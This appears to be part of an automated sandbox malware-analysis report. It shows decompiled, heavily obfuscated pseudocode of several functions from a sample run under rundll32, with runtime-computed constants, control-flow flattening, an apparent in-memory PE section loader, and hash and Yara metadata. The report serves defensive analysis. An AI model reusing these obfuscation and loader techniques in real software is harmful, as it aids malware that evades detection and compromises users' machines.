                                                                                                                      			E0069DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E00690DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E006A0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E00687FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E00683DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E0069AC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                      0x0069dee3
                                                                                                                      0x0069deea
                                                                                                                      0x0069def1
                                                                                                                      0x0069def3
                                                                                                                      0x0069def4
                                                                                                                      0x0069defb
                                                                                                                      0x0069df02
                                                                                                                      0x0069df03
                                                                                                                      0x0069df04
                                                                                                                      0x0069df09
                                                                                                                      0x0069df11
                                                                                                                      0x0069df14
                                                                                                                      0x0069df1b
                                                                                                                      0x0069df23
                                                                                                                      0x0069df28
                                                                                                                      0x0069df30
                                                                                                                      0x0069df38
                                                                                                                      0x0069df40
                                                                                                                      0x0069df48
                                                                                                                      0x0069df50
                                                                                                                      0x0069df58
                                                                                                                      0x0069df60
                                                                                                                      0x0069df68
                                                                                                                      0x0069df70
                                                                                                                      0x0069df78
                                                                                                                      0x0069df80
                                                                                                                      0x0069df85
                                                                                                                      0x0069df8a
                                                                                                                      0x0069df92
                                                                                                                      0x0069df9a
                                                                                                                      0x0069dfa6
                                                                                                                      0x0069dfa9
                                                                                                                      0x0069dfad
                                                                                                                      0x0069dfb5
                                                                                                                      0x0069dfbd
                                                                                                                      0x0069dfc5
                                                                                                                      0x0069dfcd
                                                                                                                      0x0069dfd5
                                                                                                                      0x0069dfdd
                                                                                                                      0x0069dfe5
                                                                                                                      0x0069dfed
                                                                                                                      0x0069dffa
                                                                                                                      0x0069dffe
                                                                                                                      0x0069e006
                                                                                                                      0x0069e00e
                                                                                                                      0x0069e016
                                                                                                                      0x0069e01e
                                                                                                                      0x0069e026
                                                                                                                      0x0069e02e
                                                                                                                      0x0069e036
                                                                                                                      0x0069e044
                                                                                                                      0x0069e045
                                                                                                                      0x0069e049
                                                                                                                      0x0069e051
                                                                                                                      0x0069e059
                                                                                                                      0x0069e061
                                                                                                                      0x0069e069
                                                                                                                      0x0069e071
                                                                                                                      0x0069e079
                                                                                                                      0x0069e081
                                                                                                                      0x0069e089
                                                                                                                      0x0069e099
                                                                                                                      0x0069e0a1
                                                                                                                      0x0069e0ae
                                                                                                                      0x0069e0b2
                                                                                                                      0x0069e0cc
                                                                                                                      0x0069e0d0
                                                                                                                      0x0069e0d8
                                                                                                                      0x0069e0d8
                                                                                                                      0x0069e0e6
                                                                                                                      0x0069e176
                                                                                                                      0x0069e17b
                                                                                                                      0x0069e17e
                                                                                                                      0x00000000
                                                                                                                      0x0069e0e8
                                                                                                                      0x0069e0ee
                                                                                                                      0x0069e153
                                                                                                                      0x0069e155
                                                                                                                      0x0069e158
                                                                                                                      0x00000000
                                                                                                                      0x0069e0f0
                                                                                                                      0x0069e0f6
                                                                                                                      0x0069e1bd
                                                                                                                      0x0069e0fc
                                                                                                                      0x0069e102
                                                                                                                      0x0069e13c
                                                                                                                      0x0069e13d
                                                                                                                      0x0069e13e
                                                                                                                      0x0069e143
                                                                                                                      0x0069e147
                                                                                                                      0x0069e149
                                                                                                                      0x0069e14b
                                                                                                                      0x00000000
                                                                                                                      0x0069e14b
                                                                                                                      0x0069e104
                                                                                                                      0x0069e106
                                                                                                                      0x00000000
                                                                                                                      0x0069e10c
                                                                                                                      0x0069e11e
                                                                                                                      0x0069e123
                                                                                                                      0x0069e126
                                                                                                                      0x00000000
                                                                                                                      0x0069e126
                                                                                                                      0x0069e106
                                                                                                                      0x0069e102
                                                                                                                      0x0069e0f6
                                                                                                                      0x0069e0ee
                                                                                                                      0x0069e1c5
                                                                                                                      0x0069e1c7
                                                                                                                      0x0069e1cc
                                                                                                                      0x0069e1cc
                                                                                                                      0x0069e1d3
                                                                                                                      0x0069e1d3
                                                                                                                      0x0069e18f
                                                                                                                      0x0069e192
                                                                                                                      0x0069e197
                                                                                                                      0x0069e197
                                                                                                                      0x0069e197
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d<$g$Wp
                                                                                                                      • API String ID: 0-355099142
                                                                                                                      • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                      • Instruction ID: 7fa72f499e546ebe6760510caff646df16714ebfe5bb926926156b9f7179e50f
                                                                                                                      • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                      • Instruction Fuzzy Hash: 617143B10093419FDB64CF61C48942BBBF6FBC9748F10891DF29A96620D3768A4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069C3A0 Relevance: 3.9, Strings: 3, Instructions: 150COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E0068474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E0068A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E0068ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E0068ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                      0x0069c3a5
                                                                                                                      0x0069c3a9
                                                                                                                      0x0069c3ab
                                                                                                                      0x0069c3ad
                                                                                                                      0x0069c3b1
                                                                                                                      0x0069c3b5
                                                                                                                      0x0069c3b6
                                                                                                                      0x0069c3b7
                                                                                                                      0x0069c3bc
                                                                                                                      0x0069c3c3
                                                                                                                      0x0069c3cb
                                                                                                                      0x0069c3d3
                                                                                                                      0x0069c3db
                                                                                                                      0x0069c3e6
                                                                                                                      0x0069c3eb
                                                                                                                      0x0069c3f1
                                                                                                                      0x0069c3f9
                                                                                                                      0x0069c401
                                                                                                                      0x0069c409
                                                                                                                      0x0069c416
                                                                                                                      0x0069c419
                                                                                                                      0x0069c41d
                                                                                                                      0x0069c425
                                                                                                                      0x0069c42d
                                                                                                                      0x0069c435
                                                                                                                      0x0069c43d
                                                                                                                      0x0069c445
                                                                                                                      0x0069c44d
                                                                                                                      0x0069c455
                                                                                                                      0x0069c45d
                                                                                                                      0x0069c465
                                                                                                                      0x0069c46d
                                                                                                                      0x0069c472
                                                                                                                      0x0069c47a
                                                                                                                      0x0069c482
                                                                                                                      0x0069c48a
                                                                                                                      0x0069c48f
                                                                                                                      0x0069c497
                                                                                                                      0x0069c49f
                                                                                                                      0x0069c4a7
                                                                                                                      0x0069c4af
                                                                                                                      0x0069c4b7
                                                                                                                      0x0069c4c7
                                                                                                                      0x0069c4cb
                                                                                                                      0x0069c4d4
                                                                                                                      0x0069c4d9
                                                                                                                      0x0069c4df
                                                                                                                      0x0069c4e7
                                                                                                                      0x0069c4ef
                                                                                                                      0x0069c4f7
                                                                                                                      0x0069c4ff
                                                                                                                      0x0069c507
                                                                                                                      0x0069c50f
                                                                                                                      0x0069c518
                                                                                                                      0x0069c51b
                                                                                                                      0x0069c51f
                                                                                                                      0x0069c527
                                                                                                                      0x0069c52f
                                                                                                                      0x0069c537
                                                                                                                      0x0069c53f
                                                                                                                      0x0069c54c
                                                                                                                      0x0069c550
                                                                                                                      0x0069c55a
                                                                                                                      0x0069c562
                                                                                                                      0x0069c56a
                                                                                                                      0x0069c572
                                                                                                                      0x0069c57a
                                                                                                                      0x0069c58a
                                                                                                                      0x0069c58e
                                                                                                                      0x0069c593
                                                                                                                      0x0069c595
                                                                                                                      0x0069c59a
                                                                                                                      0x0069c5a9
                                                                                                                      0x0069c5c3
                                                                                                                      0x0069c5c5
                                                                                                                      0x0069c5ca
                                                                                                                      0x0069c628
                                                                                                                      0x00000000
                                                                                                                      0x0069c62a
                                                                                                                      0x0069c5dd
                                                                                                                      0x0069c5e6
                                                                                                                      0x0069c5f0
                                                                                                                      0x0069c5f5
                                                                                                                      0x0069c623
                                                                                                                      0x0069c60a
                                                                                                                      0x0069c618
                                                                                                                      0x0069c61d
                                                                                                                      0x0069c620
                                                                                                                      0x0069c620
                                                                                                                      0x00000000
                                                                                                                      0x0069c627
                                                                                                                      0x0069c630

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P;8$V"$`y
                                                                                                                      • API String ID: 0-4109183828
                                                                                                                      • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                      • Instruction ID: d4324cd0340527e4578365d03fa73042bf0e8b5c11d5a6647aa4c0cf3ab51ab7
                                                                                                                      • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                      • Instruction Fuzzy Hash: E06155B15083409FC354CF66C88991BBBF2FBC8718F008A1CF69A96260D7B2D919CF06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00681A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00681A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E0069D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E00683DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E00682A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                      0x00681a5d
                                                                                                                      0x00681a61
                                                                                                                      0x00681a63
                                                                                                                      0x00681a65
                                                                                                                      0x00681a69
                                                                                                                      0x00681a6a
                                                                                                                      0x00681a6b
                                                                                                                      0x00681a70
                                                                                                                      0x00681a78
                                                                                                                      0x00681a7b
                                                                                                                      0x00681a85
                                                                                                                      0x00681a8d
                                                                                                                      0x00681a8f
                                                                                                                      0x00681a97
                                                                                                                      0x00681a9c
                                                                                                                      0x00681aa4
                                                                                                                      0x00681aac
                                                                                                                      0x00681ab4
                                                                                                                      0x00681abc
                                                                                                                      0x00681ac4
                                                                                                                      0x00681ad3
                                                                                                                      0x00681ad4
                                                                                                                      0x00681ad8
                                                                                                                      0x00681ae0
                                                                                                                      0x00681ae8
                                                                                                                      0x00681af5
                                                                                                                      0x00681af9
                                                                                                                      0x00681b01
                                                                                                                      0x00681b06
                                                                                                                      0x00681b0e
                                                                                                                      0x00681b16
                                                                                                                      0x00681b1e
                                                                                                                      0x00681b26
                                                                                                                      0x00681b2e
                                                                                                                      0x00681b38
                                                                                                                      0x00681b3c
                                                                                                                      0x00681b44
                                                                                                                      0x00681b4c
                                                                                                                      0x00681b51
                                                                                                                      0x00681b59
                                                                                                                      0x00681b61
                                                                                                                      0x00681b69
                                                                                                                      0x00681b6e
                                                                                                                      0x00681b72
                                                                                                                      0x00681b7d
                                                                                                                      0x00681b81
                                                                                                                      0x00681b89
                                                                                                                      0x00681b91
                                                                                                                      0x00681b96
                                                                                                                      0x00681b9e
                                                                                                                      0x00681ba6
                                                                                                                      0x00681bb0
                                                                                                                      0x00681c36
                                                                                                                      0x00681c38
                                                                                                                      0x00681bb2
                                                                                                                      0x00681bb8
                                                                                                                      0x00681bf9
                                                                                                                      0x00681bfe
                                                                                                                      0x00681c01
                                                                                                                      0x00000000
                                                                                                                      0x00681bba
                                                                                                                      0x00681bc0
                                                                                                                      0x00681c0d
                                                                                                                      0x00681c0d
                                                                                                                      0x00681c13
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00681c15
                                                                                                                      0x00681bc2
                                                                                                                      0x00681bd7
                                                                                                                      0x00681bdc
                                                                                                                      0x00681be1
                                                                                                                      0x00681be3
                                                                                                                      0x00000000
                                                                                                                      0x00681be3
                                                                                                                      0x00681be1
                                                                                                                      0x00681bc0
                                                                                                                      0x00681bb8
                                                                                                                      0x00681c44
                                                                                                                      0x00681c44
                                                                                                                      0x00681c08
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %#O$DAZ$DAZ
                                                                                                                      • API String ID: 0-2081751441
                                                                                                                      • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                      • Instruction ID: 2163a8bd31a30dde7a9d3ed5d03f43548f46e9d0eb281523d24ad4c3644ca8de
                                                                                                                      • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                      • Instruction Fuzzy Hash: 925166715083019FC758DF25D98585FBBE5FBD8708F500A2DF586A6220D375CA0A8B87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A0C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A0C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E0069C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E0069C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E0068474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                      0x006a0c14
                                                                                                                      0x006a0c1b
                                                                                                                      0x006a0c1d
                                                                                                                      0x006a0c27
                                                                                                                      0x006a0c2f
                                                                                                                      0x006a0c34
                                                                                                                      0x006a0c3c
                                                                                                                      0x006a0c44
                                                                                                                      0x006a0c49
                                                                                                                      0x006a0c51
                                                                                                                      0x006a0c56
                                                                                                                      0x006a0c5e
                                                                                                                      0x006a0c66
                                                                                                                      0x006a0c6e
                                                                                                                      0x006a0c76
                                                                                                                      0x006a0c7e
                                                                                                                      0x006a0c86
                                                                                                                      0x006a0c8e
                                                                                                                      0x006a0c96
                                                                                                                      0x006a0c9e
                                                                                                                      0x006a0ca6
                                                                                                                      0x006a0cab
                                                                                                                      0x006a0cb8
                                                                                                                      0x006a0cbc
                                                                                                                      0x006a0cc4
                                                                                                                      0x006a0cc6
                                                                                                                      0x006a0cce
                                                                                                                      0x006a0cd3
                                                                                                                      0x006a0ce7
                                                                                                                      0x006a0ce8
                                                                                                                      0x006a0cec
                                                                                                                      0x006a0cf4
                                                                                                                      0x006a0cfc
                                                                                                                      0x006a0d04
                                                                                                                      0x006a0d12
                                                                                                                      0x006a0d16
                                                                                                                      0x006a0d1e
                                                                                                                      0x006a0d26
                                                                                                                      0x006a0d2e
                                                                                                                      0x006a0d3b
                                                                                                                      0x006a0d3f
                                                                                                                      0x006a0d47
                                                                                                                      0x006a0d4f
                                                                                                                      0x006a0d57
                                                                                                                      0x006a0d5f
                                                                                                                      0x006a0d67
                                                                                                                      0x006a0d6f
                                                                                                                      0x006a0d77
                                                                                                                      0x006a0d7f
